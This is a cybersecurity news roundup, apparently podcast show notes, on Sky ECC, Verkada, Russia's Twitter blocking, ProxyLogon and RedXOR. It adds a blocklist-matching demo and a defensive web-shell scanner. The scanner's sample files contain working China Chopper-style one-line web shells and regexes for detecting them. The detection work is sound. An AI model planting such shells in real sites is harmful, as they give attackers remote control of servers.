Raided phone network Sky ECC says no, police didn’t break our encryption
On Wednesday, European police said they had arrested at least 80 people and carried out hundreds of raids after having shut down an encrypted phone network favored by crooks. The police claimed to have hacked into the Sky ECC network, then “[looked] over the shoulders” of suspects as they used customized devices to plot drug deals and murders. However, Sky ECC says it’s a pack of lies. Sky, which says it offers the “most secure messaging platform you can buy,” claims that an image from a Europol press release that supposedly depicts the app in use on a mobile device is actually from an “imposter” and a “disgruntled” former reseller and that allegations of the “crack or hack” of its encrypted communication software are “false allegations.”
(ZDNet)
‘Even 20-year-old interns’ could watch unsecured webcam feeds
Earlier this week, we reported that the feeds from more than 150,000 Internet-connected surveillance cameras from Verkada turned into a veritable gift to eavesdroppers thanks to “Super Admin” account credentials having been posted online. Well, it turns out that those admin credentials were widely shared within the company itself. According to a former senior employee, more than 100 Verkada employees, including 20-year-old interns, had access to the cameras. Even before a hacktivist collective stumbled across the admin credentials and got access to the cameras, those employees could view thousands of feeds from Tesla factories, police stations, gyms, schools, jails, and hospitals.
Russia blocks itself by mistake
Russia on Wednesday began purposefully slowing down access to Twitter, claiming that the platform had failed to delete posts that illegally urged children to take part in anti-Kremlin protests. However, it seems that the powers that be shot themselves in the foot. Within hours of the announcement about slowing down Twitter access, the government’s own sites, including Kremlin.ru, were dead in the water. Observers say that one explanation for the censorship spill-over may be this: when the Russian government tried to block t.co, Twitter’s link-shortening service, it accidentally blocked any hostname containing the string “t.co,” not just the t.co domain itself.
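The over-blocking that observers describe is what you get from a substring match on a blocklist entry instead of a proper hostname match. The following is an added example, not code from the article or from any Russian filtering system; the URL list is constructed for illustration, and the only blocklist entry is t.co. It contrasts a naive substring filter with one that parses the hostname and matches it exactly or as a subdomain.

```python
# Added example: substring blocklist vs. hostname blocklist.
# Constructed for illustration; not the filtering logic of any real censor.
from urllib.parse import urlsplit

BLOCKED_DOMAINS = {"t.co"}

# Constructed sample of URLs a filter might see. Only the first two are t.co links.
SAMPLE_URLS = [
    "https://t.co/abc123",
    "https://www.t.co/xyz",
    "https://www.microsoft.com/en-us/",     # "microsofT.COm" contains t.co
    "https://www.reddit.com/r/netsec",      # "reddiT.COm" contains t.co
    "http://kremlin.ru/",
    "https://twitter.com/home",
    "https://example.net/t.co/page",        # t.co only in the path
    "https://nott.co.uk/",                  # host ends in "t.co.uk", not a t.co subdomain
]


def naive_block(url: str) -> bool:
    """Substring match over the whole URL: the over-blocking behaviour."""
    return any(d in url for d in BLOCKED_DOMAINS)


def host_block(url: str) -> bool:
    """Match only the hostname, exactly or as a subdomain of a blocked domain."""
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in BLOCKED_DOMAINS)


def overblocked(urls=SAMPLE_URLS):
    """URLs the naive filter blocks that a hostname filter would let through."""
    return [u for u in urls if naive_block(u) and not host_block(u)]


if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(f"{u:40} naive={naive_block(u)!s:5} host={host_block(u)}")
    print("collateral damage:", overblocked())
```

Running it shows the naive filter catching microsoft.com, reddit.com, a path that merely mentions t.co and an unrelated .co.uk host, while the hostname filter blocks only t.co and its subdomains. Any real blocklist should key on the parsed hostname (or the registered domain), never on the raw URL string.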
Deep fakes coming soon from Russian & Chinese hackers, FBI warns
Malicious use of deep fakes is “almost certainly” coming to our shores, and soon, the FBI is warning. The bureau on Wednesday issued an alert saying that foreign actors are already using synthetic content at home, in their own influence campaigns, and that they’ll increasingly use it for spearphishing and social engineering in the US. The bureau pointed to private-sector research that has uncovered Chinese-language and Russian use of manipulated media in disinformation operations, CyberScoop reports. In one case, a pro-Chinese government influence operation dubbed “Spamouflage Dragon” has camouflaged itself with profile images generated by AI.
Thanks to our episode sponsor, Trend Micro

FBI & CISA warn that ProxyLogon exploit will fuel heinous attacks
The government says the ProxyLogon exploit is as serious as they come. On Wednesday, the FBI and CISA—that’s the U.S. Cybersecurity and Infrastructure Security Agency—issued a joint advisory warning that vulnerabilities in Microsoft Exchange on-premises products are actively being exploited by nation-state actors and cybercriminals. They said that the vulnerabilities can be exploited to compromise networks, steal information, encrypt data for ransom, execute a destructive attack, or sell access to compromised networks. Tens of thousands of entities, including the European Banking Authority and the Norwegian Parliament, are believed to have already been infected with a web-based backdoor called the China Chopper web shell, which gives attackers the ability to plunder email inboxes and remotely access the target systems.
New Linux malware tied to old lineup of Chinese state hackers
Researchers have spotted a new Linux malware currently being used in ongoing attacks against both Linux servers and endpoints. The researchers, who are with the Linux threat protection firm Intezer, have named the new backdoor RedXOR and have linked it to a loosely affiliated collection of hacking groups sponsored by China and known by various names, including Winnti, BARIUM, APT41, Blackfly, Suckfly, and Wicked Panda. The threat actors have been around since at least 2011, when Kaspersky discovered Winnti’s Trojan on a massive number of compromised gaming systems.
World braces for 2nd wave of Exchange attacks
Security experts are already bracing for “Stage 2” of the Exchange server attacks, when all the hacked servers get seeded with malware that will let hackers crawl even deeper into their networks. Security reporter Brian Krebs notes that researchers are now “racing to identify, alert and help victims, and hopefully prevent further mayhem.” Earlier this month, Krebs reported that at least 30,000 organizations in the US and hundreds of thousands globally had been hacked. One complicating factor is that many victims may have more than one type of backdoor installed. Some victims have had three web shells installed, one source told Krebs, while another has been infected with eight distinct backdoors.
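Both Exchange items above come down to the same first triage step for a defender: find the web shells, and find all of them, since a single victim may carry several. The following is an added example, not code from the article, Krebs, Microsoft or CISA. It walks a directory tree and flags script files whose content has the one-line “pass a request parameter straight to eval” shape of China Chopper and its close relatives; the regular expressions are my own approximation of that shape, and the sample files are constructed here so the block runs offline. For real hunting, use the published indicators for the Exchange campaign rather than these patterns alone.

```python
# Added example: minimal scan for China Chopper-style one-line web shells.
# Patterns and sample files are constructed for illustration (an assumption-level
# approximation of the shell's shape), not published IOCs.
import os
import re
import tempfile

# The ASPX variant evaluates a request parameter with eval(...,"unsafe"); an
# obfuscated form decodes the parameter through Encoding.GetEncoding first; the
# classic ASP and PHP forms do the same with eval/execute on request data.
SHELL_PATTERNS = [
    re.compile(rb'eval\s*\(\s*Request\.(Item|Form|QueryString)?\s*[\[(]', re.I),
    re.compile(rb'eval\s*\(\s*System\.Text\.Encoding\.GetEncoding', re.I),
    re.compile(rb'\b(eval|execute)\s*\(?\s*request\s*\(', re.I),     # classic ASP
    re.compile(rb'eval\s*\(\s*\$_(POST|GET|REQUEST)\s*\[', re.I),    # PHP
]
SCAN_EXTENSIONS = (".aspx", ".asp", ".ashx", ".asmx", ".php")


def scan_file(path):
    """Return the matched snippet if the file looks like a web shell, else None."""
    with open(path, "rb") as f:
        data = f.read(1 << 20)  # shells are tiny; cap the read on big files
    for pat in SHELL_PATTERNS:
        m = pat.search(data)
        if m:
            return m.group(0).decode("latin-1")
    return None


def scan_tree(root):
    """Walk root and return sorted (relative path, matched snippet) pairs."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            match = scan_file(path)
            if match:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                hits.append((rel, match))
    return sorted(hits)


# Constructed sample tree: two shell-like files, one benign page, one decoy
# with the right content but a non-script extension.
SAMPLE_FILES = {
    "owa/auth/help.aspx":
        b'<%@ Page Language="Jscript"%><%eval(Request.Item["orange"],"unsafe");%>',
    "aspnet_client/system_web/log.aspx":
        b'<%@ Page Language="Jscript"%><%eval(System.Text.Encoding.GetEncoding(936)'
        b'.GetString(System.Convert.FromBase64String(Request.Item["pass"])),"unsafe");%>',
    "ecp/default.aspx":
        b'<%@ Page Language="C#" %><html><body>Hello</body></html>',
    "owa/auth/notes.txt":
        b'eval(Request.Item["x"])',
}


def build_sample_tree():
    root = tempfile.mkdtemp(prefix="exchange-sample-")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(content)
    return root


def demo():
    """Build the constructed tree and scan it; returns the hit list."""
    return scan_tree(build_sample_tree())


if __name__ == "__main__":
    for rel, snippet in demo():
        print(f"{rel}: {snippet}")
```

The scanner reports the file and the exact fragment that matched, so an analyst can triage each hit quickly, and it keeps going after the first find, which matters when one host carries several distinct shells. Point scan_tree at the Exchange web roots (the owa, ecp and aspnet_client directories are common drop locations in the public reporting) and treat any hit as a reason to pull the file, its timestamps and the IIS logs for that path.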
Critical WordPress plugin bug being exploited in the wild
A critical bug in a popular plugin for WordPress has been letting attackers quickly, easily and remotely take over websites. The developer of the add-on, which is called Plus Addons for Elementor, says it has more than 30,000 active installations. It enables site owners to create widgets for users, including user login and registration forms, that can be added to a page built with the Elementor site-building tool. Researchers at Wordfence said this week that the zero-day is a privilege-escalation and authentication-bypass issue in the plugin’s registration form function. The vulnerability is a bad one, rated 9.8 out of 10 on the CVSS scale, and is being actively exploited in the wild.